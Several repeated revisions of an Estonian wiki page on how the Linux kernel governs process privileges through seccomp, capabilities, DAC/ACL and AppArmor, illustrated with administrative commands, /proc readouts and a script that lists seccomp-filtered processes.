root@zabbix-pub-01:~# egrep -r AmbientCapabilities /lib/systemd/
/lib/systemd/system/e2scrub_reap.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_SYS_RAWIO
/lib/systemd/system/e2scrub@.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_SYS_RAWIO
/lib/systemd/system/xfs_scrub@.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_FOWNER CAP_DAC_OVERRIDE CAP_DAC_READ_SEARCH CAP_SYS_RAWIO
/lib/systemd/system/systemd-timesyncd.service:AmbientCapabilities=CAP_SYS_TIME
/lib/systemd/system/systemd-networkd.service:AmbientCapabilities=CAP_NET_ADMIN CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_RAW
/lib/systemd/system/systemd-resolved.service:AmbientCapabilities=CAP_SETPCAP CAP_NET_RAW CAP_NET_BIND_SERVICE
</pre>

Parasjagu olevat protsesside seisu capability mõttes esitab pscap programm, nt

<pre>
root@zabbix-pub-01:~# apt-get install libcap-ng-utils
root@zabbix-pub-01:~# pscap -a
ppid pid uid command capabilities
0 1 root systemd full +
1 344 root systemd-journal chown, dac_override, dac_read_search, fowner, setgid, setuid, sys_ptrace, sys_admin, audit_control, mac_override, syslog, audit_read +
1 395 root multipathd full +
1 413 root systemd-udevd chown, dac_override, dac_read_search, fowner, fsetid, kill, setgid, setuid, setpcap, linux_immutable, net_bind_service, net_broadcast, net_admin, net_raw, ipc_lock, ipc_owner, sys_module, sys_rawio, sys_chroot, sys_ptrace, sys_pacct, sys_admin, sys_boot, sys_nice, sys_resource, sys_tty_config, mknod, lease, audit_write, audit_control, setfcap, mac_override, mac_admin, syslog, block_suspend, audit_read, perfmon, bpf, checkpoint_restore +
1 562 systemd-network systemd-network net_bind_service, net_broadcast, net_admin, net_raw @ +
1 577 systemd-resolve systemd-resolve net_raw @ +
1 593 systemd-timesync systemd-timesyn sys_time @ +
1 715 messagebus dbus-daemon audit_write +
1 719 root php-fpm8.3 full +
1 724 root qemu-ga full +
1 733 root systemd-logind chown, dac_override, dac_read_search, fowner, linux_immutable, sys_admin, sys_tty_config, audit_control, mac_admin +
...
</pre>

====Dünaamiline capability====

Ühes aknas öeldakse

<pre>
root@zabbix-pub-01:~# capsh --keep=1 --user=nobody --inh=cap_chown --addamb=cap_chown --caps="cap_chown=eip" -- -c "sleep 60"
</pre>

ja teises küsitakse

<pre>
root@zabbix-pub-01:~# ps aux | grep sleep
nobody 216107 0.0 0.1 5692 2196 pts/0 S+ 00:45 0:00 sleep 60

root@zabbix-pub-01:~# grep -i cap /proc/216107/status
CapInh: 0000000000000001
CapPrm: 0000000000000001
CapEff: 0000000000000001
CapBnd: 000001ffffffffff
CapAmb: 0000000000000001
</pre>

===seccomp===

====Tööpõhimõte====

TODO

====Misc====

seccomp leiab kõneks olevad syscallid üles nn bpf-classic filtrite abil, antud juhul 23 tükki (neid ei esita bpftool prog show)

<pre>
root@pve-svc-02:~# cat /proc/1436092/status | grep Seccomp
Seccomp: 2
Seccomp_filters: 23
</pre>

<pre>
root@dh-minio-01:~# cat seccomp-list.sh
for pid in $(ls /proc | grep -E '^[0-9]+$'); do
status=$(grep "Seccomp:" /proc/$pid/status 2>/dev/null | awk '{print $2}')
if [ "$status" = "2" ]; then
name=$(cat /proc/$pid/comm)
echo "PID $pid ($name) is SECCOMP FILTERED"
fi
done
</pre>

nt Debian v. 13 arvutis

<pre>
root@dh-minio-01:~# sh seccomp-list.sh
PID 11405 (rsyslogd) is SECCOMP FILTERED
PID 155380 (nginx) is SECCOMP FILTERED
PID 155381 (nginx) is SECCOMP FILTERED
PID 155382 (nginx) is SECCOMP FILTERED
PID 157836 (postgres) is SECCOMP FILTERED
PID 157837 (postgres) is SECCOMP FILTERED
PID 157838 (postgres) is SECCOMP FILTERED
PID 157840 (postgres) is SECCOMP FILTERED
PID 157841 (postgres) is SECCOMP FILTERED
PID 157842 (postgres) is SECCOMP FILTERED
PID 297 (systemd-journal) is SECCOMP FILTERED
PID 322 (systemd-timesyn) is SECCOMP FILTERED
PID 353 (systemd-udevd) is SECCOMP FILTERED
PID 653 (systemd-logind) is SECCOMP FILTERED
</pre>

====Kasulikud lisamaterjalid====

* https://oneuptime.com/blog/post/2026-03-02-how-to-use-seccomp-to-restrict-system-calls-on-ubuntu/view

===Kasulikud lisamaterjalid===

* TODO

Linux kernel kontrollib tegevusi

2026-05-04T13:31:58Z

Imre:

===Sissejuhatus===

TODO

===Mõisted===

* seccomp
* capabilities
* dac/acl
* lsm

===Tööpõhimõte===

Väited

* protsess on arvutis esinev kõige olulisem nähtus - kõik muu on nö teda teenindav personal (riistvara, kernel, namespace-capabilities-seccomp-syscalls-jms raamistik)
* arvuti (prosessi) ülesandaks on üldiselt teisendada sisend väljundiks (kasutades seejuures riistara, tarkvara st teisi abistavaid protsesse jme)
* üldiselt tahab protsess kasutada mingit ressurssi ja seda on vaja kontrollida (nt peab süsteem otsustama, kas seda kasutamist lubada)
* privileegid (st õigus midagi teha, midagi kasutada) pole mitte niivõrd kasutajal, aga privileegid on protsessil
* protsessi privileegid tulenevad muu hulgast kolmest asjaolust: 1. seccomp syscall tulemüür, 2. capabilities, 3. lsm
* capability'le vastab komplekt syscallisid (tavaliselt)
* system call (syscall, 'make system call') - xxx

Syscallisid on üldiselt kahesuguseid

* Automatic Syscalls: Actions like mmap(), read(), or brk() are considered "safe." The kernel assumes that if you have the memory or the file handle, you can perform these actions. No special "permission" is needed beyond standard file permissions.
* Restricted Syscalls: Actions like clock_adjtime(), reboot(), or mount() are "dangerous." Historically, the kernel had a simple rule: if (uid == 0) (Root), allow; else, deny.

Väited syscall kasutamise kohta

* kui tavakasutaja tegeleb omale kuuluva tekstifaili sisu muutmisega, siis ta esmalt sooritab open() syscalli ja seda üldiselt lubatakse kõigil kasutajatel teha, seejuures saab süsteem teada, kas kasutajal on lubatud kõnealuse failiga tegeleda ja mil viisil jne; ja edasi kasutaja ütleb read() syscall'i: read() iseenesest vajab tugevaid lube töötamiseks, aga süsteem tuletab loa protsessi omaniku/grupi kõrvutamisest faili omaniku/grupi ja loabittidega - näiliselt tundub, et read(), write() jt selliste syscallide kasutamine toimub väga liberaalselt
* kui kasutaja root käivitab tekstireadaktori asub tegelema tekstifaili sisu muutmisega, siis toimub sarnane kontroll kuid see annab väga jaatava vastuse kuna kasutaja on root (uid=0) - kernelil on kasutada loogika, et kui kasutaja on root, siis see on samaväärne kõigi capacitite olemasoluga

Joonis

<pre>
töötav protsess -> syscall liides -> kernel -> ressurss

^ ^ ^
| | |
| | |

seccomp tulemüür capabilities lsm (apparmor)
dac
</pre>

kus

* systemd - tegeleb seccomp ja capabilities rakendamisega
* apparmor - tegeleb lsm rakendamisega
* tundub, et reaalsuses see olukord ei ole väga sirgejooneline - nt apparmor sätib samuti capabilitisid (rakendub nö kõige suurem kitsendus)

===gemini joonis===

<pre>
[ PROCESS ]
|
| 1. SECCOMP GATE (The Vocabulary Check)
| "Is this syscall even allowed to be uttered?"
| [ Filter: 23 active ] ---------------------> [ REJECT / SIGSYS ]
|
v
| 2. CAPABILITIES GATE (The Authority Check)
| "Does this process hold the specific bit for this action?"
| [ e.g., CAP_SYS_TIME ] --------------------> [ REJECT / EPERM ]
|
v
| 3. DAC / ACL GATE (The Identity Check)
| "Is the process UID/GID on the list for this file/device?"
| [ Feature: +ACL ] -------------------------> [ REJECT / EACCES ]
|
v
| 4. LSM / MAC GATE (The Policy "Horizon")
| "Does the overall security policy permit this role this access?"
| [ AppArmor / SELINUX ] --------------------> [ REJECT / DENIED ]
|
v
[ RESOURCE ] (e.g., /dev/sda, System Clock, Network Socket)
</pre>

===Capabilities===

Linuxi tuumas on üldotstarbeline capability süsteem, mille abil nt saab protsessidele anda erinevaid privileege. Nt üks selline capabiliti on dac_override, mis seisneb selles, et root kasutajal on õigus sõita üle enamusest piirangutest, nt saab root töötada kasutajale kuuluvate failidega. Kui root kasutajale ei anna apparmor profiil erilisi privileege, siis root kasutaja on enam-vähem samaväärne tavakasutajaga, mille nimeks on 'root'. St tal ei ole õigust nt teiste kasutajate faile lugeda. Selleks, et root kasutajale kehtestatud apparmor profiili tingimustes see ülesõitmise privileeg tagasi tekiks sobib kasutada profiilis rida 'capability dac_override'. Capability süsteem on üldotstarbeline, ta ei ole LSM komponent, nt üks tema esinemise koht on selles, et uuemal ajal /bin/ping ei ole enam setuid

<pre>
# ls -ld /bin/ping
-rwxr-xr-x 1 root root 44104 Nov 8 2014 /bin/ping

# getcap /bin/ping
/bin/ping = cap_net_raw+ep

# getfattr -d -m "^security\\." /bin/ping
getfattr: Removing leading '/' from absolute path names
# file: bin/ping
security.capability=0sAQAAAgAgAAAAAAAAAAAAAAAAAAA=
</pre>

Kusjuures stat programm kasutab nn legacy syscall'i ja ei esita capabilities kohta infot (olevat olemas ka statx)

Failile cap seadistamiseks sobib öelda nt

# setcap cap_net_raw,cap_setuid,cap_setgid+ep /tmp/capable

kus

* +ep - kehtestatud

Kasulikud lisamaterjalid

* https://wiki.archlinux.org/index.php/Capabilities
* man capabilities
* https://sites.google.com/site/fullycapable/Home
* /etc/security/capability.conf

===Capabilities - 2026 kevad märkmed===

Väited

* teatud mõttes capabilities laiendab nö klassikaliselt setuid lahendust (mis võimaldab faili omaduste alusel tuletada protsessi käivitamise jaoks sobivad privileegid - tavaliselt tavakasutaja -> root kasutaja)
* võimalik on tekitada tavakasutajale kuuluva protsessi, mis on binditud privilegeeritud st <1024 port külge
* teatud määral päritakse capabilitied parent protsessi käest child protsessi poolt

capabilities saab toimuda kahe nö allika põhiselt

* faili xattr alusel staatiliselt
* kõrgema privileegiga protsessi poolt väljakutsutud viisil dünaamiliselt (nt systemd service unit)

systemd puhul tavaliselt seadistatakse alumime ja ülemine lagi privileegidega

<pre>
root@zabbix-pub-01:~# systemctl show systemd-resolved | grep Capab
CapabilityBoundingSet=cap_setpcap cap_net_bind_service cap_net_raw
AmbientCapabilities=cap_setpcap cap_net_bind_service cap_net_raw

root@zabbix-pub-01:~# egrep -r AmbientCapabilities /lib/systemd/
/lib/systemd/system/e2scrub_reap.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_SYS_RAWIO
/lib/systemd/system/e2scrub@.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_SYS_RAWIO
/lib/systemd/system/xfs_scrub@.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_FOWNER CAP_DAC_OVERRIDE CAP_DAC_READ_SEARCH CAP_SYS_RAWIO
/lib/systemd/system/systemd-timesyncd.service:AmbientCapabilities=CAP_SYS_TIME
/lib/systemd/system/systemd-networkd.service:AmbientCapabilities=CAP_NET_ADMIN CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_RAW
/lib/systemd/system/systemd-resolved.service:AmbientCapabilities=CAP_SETPCAP CAP_NET_RAW CAP_NET_BIND_SERVICE
</pre>

Parasjagu olevat protsesside seisu capability mõttes esitab pscap programm, nt

<pre>
root@zabbix-pub-01:~# apt-get install libcap-ng-utils
root@zabbix-pub-01:~# pscap -a
ppid pid uid command capabilities
0 1 root systemd full +
1 344 root systemd-journal chown, dac_override, dac_read_search, fowner, setgid, setuid, sys_ptrace, sys_admin, audit_control, mac_override, syslog, audit_read +
1 395 root multipathd full +
1 413 root systemd-udevd chown, dac_override, dac_read_search, fowner, fsetid, kill, setgid, setuid, setpcap, linux_immutable, net_bind_service, net_broadcast, net_admin, net_raw, ipc_lock, ipc_owner, sys_module, sys_rawio, sys_chroot, sys_ptrace, sys_pacct, sys_admin, sys_boot, sys_nice, sys_resource, sys_tty_config, mknod, lease, audit_write, audit_control, setfcap, mac_override, mac_admin, syslog, block_suspend, audit_read, perfmon, bpf, checkpoint_restore +
1 562 systemd-network systemd-network net_bind_service, net_broadcast, net_admin, net_raw @ +
1 577 systemd-resolve systemd-resolve net_raw @ +
1 593 systemd-timesync systemd-timesyn sys_time @ +
1 715 messagebus dbus-daemon audit_write +
1 719 root php-fpm8.3 full +
1 724 root qemu-ga full +
1 733 root systemd-logind chown, dac_override, dac_read_search, fowner, linux_immutable, sys_admin, sys_tty_config, audit_control, mac_admin +
...
</pre>

====Dünaamiline capability====

Ühes aknas öeldakse

<pre>
root@zabbix-pub-01:~# capsh --keep=1 --user=nobody --inh=cap_chown --addamb=cap_chown --caps="cap_chown=eip" -- -c "sleep 60"
</pre>

ja teises küsitakse

<pre>
root@zabbix-pub-01:~# ps aux | grep sleep
nobody 216107 0.0 0.1 5692 2196 pts/0 S+ 00:45 0:00 sleep 60

root@zabbix-pub-01:~# grep -i cap /proc/216107/status
CapInh: 0000000000000001
CapPrm: 0000000000000001
CapEff: 0000000000000001
CapBnd: 000001ffffffffff
CapAmb: 0000000000000001
</pre>

===seccomp===

====Tööpõhimõte====

TODO

====Misc====

seccomp leiab kõneks olevad syscallid üles nn bpf-classic filtrite abil, antud juhul 23 tükki (neid ei esita bpftool prog show)

<pre>
root@pve-svc-02:~# cat /proc/1436092/status | grep Seccomp
Seccomp: 2
Seccomp_filters: 23
</pre>

<pre>
root@dh-minio-01:~# cat seccomp-list.sh
for pid in $(ls /proc | grep -E '^[0-9]+$'); do
status=$(grep "Seccomp:" /proc/$pid/status 2>/dev/null | awk '{print $2}')
if [ "$status" = "2" ]; then
name=$(cat /proc/$pid/comm)
echo "PID $pid ($name) is SECCOMP FILTERED"
fi
done
</pre>

nt Debian v. 13 arvutis

<pre>
root@dh-minio-01:~# sh seccomp-list.sh
PID 11405 (rsyslogd) is SECCOMP FILTERED
PID 155380 (nginx) is SECCOMP FILTERED
PID 155381 (nginx) is SECCOMP FILTERED
PID 155382 (nginx) is SECCOMP FILTERED
PID 157836 (postgres) is SECCOMP FILTERED
PID 157837 (postgres) is SECCOMP FILTERED
PID 157838 (postgres) is SECCOMP FILTERED
PID 157840 (postgres) is SECCOMP FILTERED
PID 157841 (postgres) is SECCOMP FILTERED
PID 157842 (postgres) is SECCOMP FILTERED
PID 297 (systemd-journal) is SECCOMP FILTERED
PID 322 (systemd-timesyn) is SECCOMP FILTERED
PID 353 (systemd-udevd) is SECCOMP FILTERED
PID 653 (systemd-logind) is SECCOMP FILTERED
</pre>

====Kasulikud lisamaterjalid====

* https://oneuptime.com/blog/post/2026-03-02-how-to-use-seccomp-to-restrict-system-calls-on-ubuntu/view

===Kasulikud lisamaterjalid===

* TODO

Linux kernel kontrollib tegevusi

2026-05-04T10:15:40Z

Imre: /* Capabilities */

===Sissejuhatus===

TODO

===Mõisted===

* seccomp
* capabilities
* dac/acl
* lsm

===Tööpõhimõte===

Väited

* üldiselt tahab protsess kasutada mingit ressurssi ja seda on vaja kontrollida (nt peab süsteem otsustama, kas seda kasutamist lubada)
* privileegid (st õigus midagi teha, midagi kasutada) pole mitte niivõrd kasutajal, aga privileegid on protsessil
* protsessi privileegid tulenevad muu hulgast kolmest asjaolust: 1. seccomp syscall tulemüür, 2. capabilities, 3. lsm
* capability'le vastab komplekt syscallisid (tavaliselt)
* system call (syscall, 'make system call') - xxx

Syscallisid on üldiselt kahesuguseid

* Automatic Syscalls: Actions like mmap(), read(), or brk() are considered "safe." The kernel assumes that if you have the memory or the file handle, you can perform these actions. No special "permission" is needed beyond standard file permissions.
* Restricted Syscalls: Actions like clock_adjtime(), reboot(), or mount() are "dangerous." Historically, the kernel had a simple rule: if (uid == 0) (Root), allow; else, deny.

Väited syscall kasutamise kohta

* kui tavakasutaja tegeleb omale kuuluva tekstifaili sisu muutmisega, siis ta esmalt sooritab open() syscalli ja seda üldiselt lubatakse kõigil kasutajatel teha, seejuures saab süsteem teada, kas kasutajal on lubatud kõnealuse failiga tegeleda ja mil viisil jne; ja edasi kasutaja ütleb read() syscall'i: read() iseenesest vajab tugevaid lube töötamiseks, aga süsteem tuletab loa protsessi omaniku/grupi kõrvutamisest faili omaniku/grupi ja loabittidega - näiliselt tundub, et read(), write() jt selliste syscallide kasutamine toimub väga liberaalselt
* kui kasutaja root käivitab tekstireadaktori asub tegelema tekstifaili sisu muutmisega, siis toimub sarnane kontroll kuid see annab väga jaatava vastuse kuna kasutaja on root (uid=0) - kernelil on kasutada loogika, et kui kasutaja on root, siis see on samaväärne kõigi capacitite olemasoluga

Joonis

<pre>
töötav protsess -> syscall liides -> kernel -> ressurss

^ ^ ^
| | |
| | |

seccomp tulemüür capabilities lsm (apparmor)
dac
</pre>

kus

* systemd - tegeleb seccomp ja capabilities rakendamisega
* apparmor - tegeleb lsm rakendamisega
* tundub, et reaalsuses see olukord ei ole väga sirgejooneline - nt apparmor sätib samuti capabilitisid (rakendub nö kõige suurem kitsendus)

===gemini joonis===

<pre>
[ PROCESS ]
|
| 1. SECCOMP GATE (The Vocabulary Check)
| "Is this syscall even allowed to be uttered?"
| [ Filter: 23 active ] ---------------------> [ REJECT / SIGSYS ]
|
v
| 2. CAPABILITIES GATE (The Authority Check)
| "Does this process hold the specific bit for this action?"
| [ e.g., CAP_SYS_TIME ] --------------------> [ REJECT / EPERM ]
|
v
| 3. DAC / ACL GATE (The Identity Check)
| "Is the process UID/GID on the list for this file/device?"
| [ Feature: +ACL ] -------------------------> [ REJECT / EACCES ]
|
v
| 4. LSM / MAC GATE (The Policy "Horizon")
| "Does the overall security policy permit this role this access?"
| [ AppArmor / SELINUX ] --------------------> [ REJECT / DENIED ]
|
v
[ RESOURCE ] (e.g., /dev/sda, System Clock, Network Socket)
</pre>

===Capabilities===

Linuxi tuumas on üldotstarbeline capability süsteem, mille abil nt saab protsessidele anda erinevaid privileege. Nt üks selline capabiliti on dac_override, mis seisneb selles, et root kasutajal on õigus sõita üle enamusest piirangutest, nt saab root töötada kasutajale kuuluvate failidega. Kui root kasutajale ei anna apparmor profiil erilisi privileege, siis root kasutaja on enam-vähem samaväärne tavakasutajaga, mille nimeks on 'root'. St tal ei ole õigust nt teiste kasutajate faile lugeda. Selleks, et root kasutajale kehtestatud apparmor profiili tingimustes see ülesõitmise privileeg tagasi tekiks sobib kasutada profiilis rida 'capability dac_override'. Capability süsteem on üldotstarbeline, ta ei ole LSM komponent, nt üks tema esinemise koht on selles, et uuemal ajal /bin/ping ei ole enam setuid

<pre>
# ls -ld /bin/ping
-rwxr-xr-x 1 root root 44104 Nov 8 2014 /bin/ping

# getcap /bin/ping
/bin/ping = cap_net_raw+ep

# getfattr -d -m "^security\\." /bin/ping
getfattr: Removing leading '/' from absolute path names
# file: bin/ping
security.capability=0sAQAAAgAgAAAAAAAAAAAAAAAAAAA=
</pre>

Kusjuures stat programm kasutab nn legacy syscall'i ja ei esita capabilities kohta infot (olevat olemas ka statx)

Failile cap seadistamiseks sobib öelda nt

# setcap cap_net_raw,cap_setuid,cap_setgid+ep /tmp/capable

kus

* +ep - kehtestatud

Kasulikud lisamaterjalid

* https://wiki.archlinux.org/index.php/Capabilities
* man capabilities
* https://sites.google.com/site/fullycapable/Home
* /etc/security/capability.conf

===Capabilities - 2026 kevad märkmed===

Väited

* teatud mõttes capabilities laiendab nö klassikaliselt setuid lahendust (mis võimaldab faili omaduste alusel tuletada protsessi käivitamise jaoks sobivad privileegid - tavaliselt tavakasutaja -> root kasutaja)
* võimalik on tekitada tavakasutajale kuuluva protsessi, mis on binditud privilegeeritud st <1024 port külge
* teatud määral päritakse capabilitied parent protsessi käest child protsessi poolt

capabilities saab toimuda kahe nö allika põhiselt

* faili xattr alusel staatiliselt
* kõrgema privileegiga protsessi poolt väljakutsutud viisil dünaamiliselt (nt systemd service unit)

systemd puhul tavaliselt seadistatakse alumime ja ülemine lagi privileegidega

<pre>
root@zabbix-pub-01:~# systemctl show systemd-resolved | grep Capab
CapabilityBoundingSet=cap_setpcap cap_net_bind_service cap_net_raw
AmbientCapabilities=cap_setpcap cap_net_bind_service cap_net_raw

root@zabbix-pub-01:~# egrep -r AmbientCapabilities /lib/systemd/
/lib/systemd/system/e2scrub_reap.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_SYS_RAWIO
/lib/systemd/system/e2scrub@.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_SYS_RAWIO
/lib/systemd/system/xfs_scrub@.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_FOWNER CAP_DAC_OVERRIDE CAP_DAC_READ_SEARCH CAP_SYS_RAWIO
/lib/systemd/system/systemd-timesyncd.service:AmbientCapabilities=CAP_SYS_TIME
/lib/systemd/system/systemd-networkd.service:AmbientCapabilities=CAP_NET_ADMIN CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_RAW
/lib/systemd/system/systemd-resolved.service:AmbientCapabilities=CAP_SETPCAP CAP_NET_RAW CAP_NET_BIND_SERVICE
</pre>

Parasjagu olevat protsesside seisu capability mõttes esitab pscap programm, nt

<pre>
root@zabbix-pub-01:~# apt-get install libcap-ng-utils
root@zabbix-pub-01:~# pscap -a
ppid pid uid command capabilities
0 1 root systemd full +
1 344 root systemd-journal chown, dac_override, dac_read_search, fowner, setgid, setuid, sys_ptrace, sys_admin, audit_control, mac_override, syslog, audit_read +
1 395 root multipathd full +
1 413 root systemd-udevd chown, dac_override, dac_read_search, fowner, fsetid, kill, setgid, setuid, setpcap, linux_immutable, net_bind_service, net_broadcast, net_admin, net_raw, ipc_lock, ipc_owner, sys_module, sys_rawio, sys_chroot, sys_ptrace, sys_pacct, sys_admin, sys_boot, sys_nice, sys_resource, sys_tty_config, mknod, lease, audit_write, audit_control, setfcap, mac_override, mac_admin, syslog, block_suspend, audit_read, perfmon, bpf, checkpoint_restore +
1 562 systemd-network systemd-network net_bind_service, net_broadcast, net_admin, net_raw @ +
1 577 systemd-resolve systemd-resolve net_raw @ +
1 593 systemd-timesync systemd-timesyn sys_time @ +
1 715 messagebus dbus-daemon audit_write +
1 719 root php-fpm8.3 full +
1 724 root qemu-ga full +
1 733 root systemd-logind chown, dac_override, dac_read_search, fowner, linux_immutable, sys_admin, sys_tty_config, audit_control, mac_admin +
...
</pre>

====Dünaamiline capability====

Ühes aknas öeldakse

<pre>
root@zabbix-pub-01:~# capsh --keep=1 --user=nobody --inh=cap_chown --addamb=cap_chown --caps="cap_chown=eip" -- -c "sleep 60"
</pre>

ja teises küsitakse

<pre>
root@zabbix-pub-01:~# ps aux | grep sleep
nobody 216107 0.0 0.1 5692 2196 pts/0 S+ 00:45 0:00 sleep 60

root@zabbix-pub-01:~# grep -i cap /proc/216107/status
CapInh: 0000000000000001
CapPrm: 0000000000000001
CapEff: 0000000000000001
CapBnd: 000001ffffffffff
CapAmb: 0000000000000001
</pre>

===seccomp===

====Tööpõhimõte====

TODO

====Misc====

seccomp leiab kõneks olevad syscallid üles nn bpf-classic filtrite abil, antud juhul 23 tükki (neid ei esita bpftool prog show)

<pre>
root@pve-svc-02:~# cat /proc/1436092/status | grep Seccomp
Seccomp: 2
Seccomp_filters: 23
</pre>

<pre>
root@dh-minio-01:~# cat seccomp-list.sh
for pid in $(ls /proc | grep -E '^[0-9]+$'); do
status=$(grep "Seccomp:" /proc/$pid/status 2>/dev/null | awk '{print $2}')
if [ "$status" = "2" ]; then
name=$(cat /proc/$pid/comm)
echo "PID $pid ($name) is SECCOMP FILTERED"
fi
done
</pre>

nt Debian v. 13 arvutis

<pre>
root@dh-minio-01:~# sh seccomp-list.sh
PID 11405 (rsyslogd) is SECCOMP FILTERED
PID 155380 (nginx) is SECCOMP FILTERED
PID 155381 (nginx) is SECCOMP FILTERED
PID 155382 (nginx) is SECCOMP FILTERED
PID 157836 (postgres) is SECCOMP FILTERED
PID 157837 (postgres) is SECCOMP FILTERED
PID 157838 (postgres) is SECCOMP FILTERED
PID 157840 (postgres) is SECCOMP FILTERED
PID 157841 (postgres) is SECCOMP FILTERED
PID 157842 (postgres) is SECCOMP FILTERED
PID 297 (systemd-journal) is SECCOMP FILTERED
PID 322 (systemd-timesyn) is SECCOMP FILTERED
PID 353 (systemd-udevd) is SECCOMP FILTERED
PID 653 (systemd-logind) is SECCOMP FILTERED
</pre>

====Kasulikud lisamaterjalid====

* https://oneuptime.com/blog/post/2026-03-02-how-to-use-seccomp-to-restrict-system-calls-on-ubuntu/view

===Kasulikud lisamaterjalid===

* TODO

Linux kernel kontrollib tegevusi

2026-05-04T00:04:40Z

Imre: /* Tööpõhimõte */

===Sissejuhatus===

TODO

===Mõisted===

* seccomp
* capabilities
* dac/acl
* lsm

===Tööpõhimõte===

Väited

* üldiselt tahab protsess kasutada mingit ressurssi ja seda on vaja kontrollida (nt peab süsteem otsustama, kas seda kasutamist lubada)
* privileegid (st õigus midagi teha, midagi kasutada) pole mitte niivõrd kasutajal, aga privileegid on protsessil
* protsessi privileegid tulenevad muu hulgast kolmest asjaolust: 1. seccomp syscall tulemüür, 2. capabilities, 3. lsm
* capability'le vastab komplekt syscallisid (tavaliselt)
* system call (syscall, 'make system call') - xxx

Syscallisid on üldiselt kahesuguseid

* Automatic Syscalls: Actions like mmap(), read(), or brk() are considered "safe." The kernel assumes that if you have the memory or the file handle, you can perform these actions. No special "permission" is needed beyond standard file permissions.
* Restricted Syscalls: Actions like clock_adjtime(), reboot(), or mount() are "dangerous." Historically, the kernel had a simple rule: if (uid == 0) (Root), allow; else, deny.

Väited syscall kasutamise kohta

* kui tavakasutaja tegeleb omale kuuluva tekstifaili sisu muutmisega, siis ta esmalt sooritab open() syscalli ja seda üldiselt lubatakse kõigil kasutajatel teha, seejuures saab süsteem teada, kas kasutajal on lubatud kõnealuse failiga tegeleda ja mil viisil jne; ja edasi kasutaja ütleb read() syscall'i: read() iseenesest vajab tugevaid lube töötamiseks, aga süsteem tuletab loa protsessi omaniku/grupi kõrvutamisest faili omaniku/grupi ja loabittidega - näiliselt tundub, et read(), write() jt selliste syscallide kasutamine toimub väga liberaalselt
* kui kasutaja root käivitab tekstireadaktori asub tegelema tekstifaili sisu muutmisega, siis toimub sarnane kontroll kuid see annab väga jaatava vastuse kuna kasutaja on root (uid=0) - kernelil on kasutada loogika, et kui kasutaja on root, siis see on samaväärne kõigi capacitite olemasoluga

Joonis

<pre>
töötav protsess -> syscall liides -> kernel -> ressurss

^ ^ ^
| | |
| | |

seccomp tulemüür capabilities lsm (apparmor)
dac
</pre>

kus

* systemd - tegeleb seccomp ja capabilities rakendamisega
* apparmor - tegeleb lsm rakendamisega
* tundub, et reaalsuses see olukord ei ole väga sirgejooneline - nt apparmor sätib samuti capabilitisid (rakendub nö kõige suurem kitsendus)

===gemini joonis===

<pre>
[ PROCESS ]
|
| 1. SECCOMP GATE (The Vocabulary Check)
| "Is this syscall even allowed to be uttered?"
| [ Filter: 23 active ] ---------------------> [ REJECT / SIGSYS ]
|
v
| 2. CAPABILITIES GATE (The Authority Check)
| "Does this process hold the specific bit for this action?"
| [ e.g., CAP_SYS_TIME ] --------------------> [ REJECT / EPERM ]
|
v
| 3. DAC / ACL GATE (The Identity Check)
| "Is the process UID/GID on the list for this file/device?"
| [ Feature: +ACL ] -------------------------> [ REJECT / EACCES ]
|
v
| 4. LSM / MAC GATE (The Policy "Horizon")
| "Does the overall security policy permit this role this access?"
| [ AppArmor / SELINUX ] --------------------> [ REJECT / DENIED ]
|
v
[ RESOURCE ] (e.g., /dev/sda, System Clock, Network Socket)
</pre>

===Capabilities===

Linuxi tuumas on üldotstarbeline capability süsteem, mille abil nt saab protsessidele anda erinevaid privileege. Nt üks selline capabiliti on dac_override, mis seisneb selles, et root kasutajal on õigus sõita üle enamusest piirangutest, nt saab root töötada kasutajale kuuluvate failidega. Kui root kasutajale ei anna apparmor profiil erilisi privileege, siis root kasutaja on enam-vähem samaväärne tavakasutajaga, mille nimeks on 'root'. St tal ei ole õigust nt teiste kasutajate faile lugeda. Selleks, et root kasutajale kehtestatud apparmor profiili tingimustes see ülesõitmise privileeg tagasi tekiks sobib kasutada profiilis rida 'capability dac_override'. Capability süsteem on üldotstarbeline, ta ei ole LSM komponent, nt üks tema esinemise koht on selles, et uuemal ajal /bin/ping ei ole enam setuid

<pre>
# ls -ld /bin/ping
-rwxr-xr-x 1 root root 44104 Nov 8 2014 /bin/ping

# getcap /bin/ping
/bin/ping = cap_net_raw+ep

# getfattr -d -m "^security\\." /bin/ping
getfattr: Removing leading '/' from absolute path names
# file: bin/ping
security.capability=0sAQAAAgAgAAAAAAAAAAAAAAAAAAA=
</pre>

Kusjuures stat programm kasutab nn legacy syscall'i ja ei esita capabilities kohta infot (olevat olemas ka statx)

Failile cap seadistamiseks sobib öelda nt

# setcap cap_net_raw,cap_setuid,cap_setgid+ep /tmp/capable

kus

* +ep - kehtestatud

Kasulikud lisamaterjalid

* https://wiki.archlinux.org/index.php/Capabilities
* man capabilities

===Capabilities - 2026 kevad märkmed===

Väited

* teatud mõttes capabilities laiendab nö klassikaliselt setuid lahendust (mis võimaldab faili omaduste alusel tuletada protsessi käivitamise jaoks sobivad privileegid - tavaliselt tavakasutaja -> root kasutaja)
* võimalik on tekitada tavakasutajale kuuluva protsessi, mis on binditud privilegeeritud st <1024 port külge
* teatud määral päritakse capabilitied parent protsessi käest child protsessi poolt

capabilities saab toimuda kahe nö allika põhiselt

* faili xattr alusel staatiliselt
* kõrgema privileegiga protsessi poolt väljakutsutud viisil dünaamiliselt (nt systemd service unit)

systemd puhul tavaliselt seadistatakse alumime ja ülemine lagi privileegidega

<pre>
root@zabbix-pub-01:~# systemctl show systemd-resolved | grep Capab
CapabilityBoundingSet=cap_setpcap cap_net_bind_service cap_net_raw
AmbientCapabilities=cap_setpcap cap_net_bind_service cap_net_raw

root@zabbix-pub-01:~# egrep -r AmbientCapabilities /lib/systemd/
/lib/systemd/system/e2scrub_reap.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_SYS_RAWIO
